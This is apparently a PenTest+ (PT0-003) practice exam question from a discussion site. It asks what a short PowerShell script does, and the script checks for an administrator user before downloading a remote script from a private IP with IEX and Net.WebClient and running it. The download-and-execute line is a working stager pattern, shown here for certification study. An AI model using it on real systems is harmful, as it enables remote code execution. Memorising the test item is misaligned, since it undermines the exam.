List of questions
Related questions
Question 77 - PT0-003 discussion
Given the following script:
$1 = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.split('\')[1]
If ($1 -eq 'administrator') {
echo IEX(New-Object Net.WebClient).Downloadstring('http://10.10.11.12:8080/ul/windows.ps1') | powershell -noprofile -}
Which of the following is the penetration tester most likely trying to do?
Choose the correct answer
A.
Change the system's wallpaper based on the current user's preferences.
B.
Capture the administrator's password and transmit it to a remote server.
C.
Conditionally stage and execute a remote script.
D.
Log the internet browsing history for a systems administrator.
Your answer:
0 comments
Sorted by
Leave a comment first